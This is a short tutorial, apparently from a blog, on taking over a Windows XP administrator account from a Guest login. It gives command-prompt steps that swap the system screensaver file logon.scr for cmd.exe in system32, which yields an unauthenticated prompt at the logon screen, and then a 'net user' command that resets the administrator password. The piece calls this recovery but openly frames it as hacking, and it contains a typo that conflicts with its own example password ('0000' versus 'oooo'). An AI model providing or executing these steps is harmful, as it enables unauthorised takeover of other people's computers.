
Trick to recover Windows XP administrator password using command prompt

Learn how to hack the Windows XP password by using the simple commands of command prompt.

Hack Windows XP
We all know about the command prompt and its feature. If you don't know till yet, then you will be amazed that command prompt can be used for recovering passwords of Windows. There is a cool Trick for cracking Microsoft Windows XP password. To use this Trick just follow the simple mentioned steps :

1) Log in to Windows via Guest or any other Account.

2) Go to command prompt and input the following commands:
  • cd\  >>  press Enter.
  • cd\windows\system32  >>  press Enter.
  • mkdir temphack  >>  press Enter.
  • copy logon.scr temphack\logon.scr  >>  press Enter.
  • copy cmd.exe temphack\cmd.exe  >>  press Enter.
  • del logon.scr  >>  press Enter.
  • rename cmd.exe logon.scr  >>  press Enter.
  • exit  >>  press Enter.
Now here what we have done is this that, we have just back up the command prompt and the screen saver file and then edited the settings. This is done so as when Windows loads the screen saver, we will get an unprotected command prompt without Logging in.

Now when the screen saver appears, enter the username and password. Like if the administrator user name is "Admin" and you want the password "0000", then you would be entering “net user Admin oooo".

Finally you have changed the Administrator password to 0000. Now you can Log in and enjoy the Administrative account with full control and rights.
Hack Windows XP
There is also another Trick of recovering Windows Login password using command prompt, have look over this Trick here:
Not only this you can also recover Windows Login password through guest Login, have a look over this Trick here:
So these were the simple cool Tricks to recover Windows XP Administrator password using command prompt.

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